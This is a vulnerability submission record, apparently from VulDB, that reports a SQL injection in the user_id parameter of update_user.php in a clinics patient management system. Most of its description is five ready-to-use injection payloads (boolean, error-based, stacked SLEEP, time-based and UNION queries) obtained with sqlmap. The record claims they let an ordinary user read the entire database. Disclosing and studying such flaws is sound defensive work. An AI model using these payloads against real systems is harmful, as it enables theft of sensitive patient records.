| Title | Sql injection exists in uesr_id parameter of clinics patient management system |
|---|
| Description | SQL injection vulnerability exists in user_id parameter of update_user.php file of clinics patient management system.Using sqlmap to inject it, you can get the result of sql injection, which means that an ordinary user can obtain all the information in the database
Payload:user_id=1 AND 6941=(SELECT (CASE WHEN (6941=6941) THEN 6941 ELSE (SELECT 3566 UNION SELECT 9483) END))-- -
or user_id=1 AND GTID_SUBSET(CONCAT(0x7162627171,(SELECT (ELT(8867=8867,1))),0x716b626271),8867)
or user_id=1;SELECT SLEEP(5)#
or user_id=1 AND (SELECT 6696 FROM (SELECT(SLEEP(5)))VRDq)
or user_id=-8122 UNION ALL SELECT NULL,CONCAT(0x7162627171,0x4f4f756e4c68676444704b75576d6e4b666b6c71684e7674445179666a7166676f5664484b4f4c4d,0x716b626271),NULL-- - |
|---|
| Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/clinics%20patient%20management%20system/clinics-patient-management-system%20vlun2.pdf |
|---|
| User | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| Submission | 02/25/2023 04:42 (3 years ago) |
|---|
| Moderation | 02/25/2023 08:47 (4 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 221784 [SourceCodester Clinics Patient Management System 1.0 update_user.php user_id sql injection] |
|---|
| Points | 20 |
|---|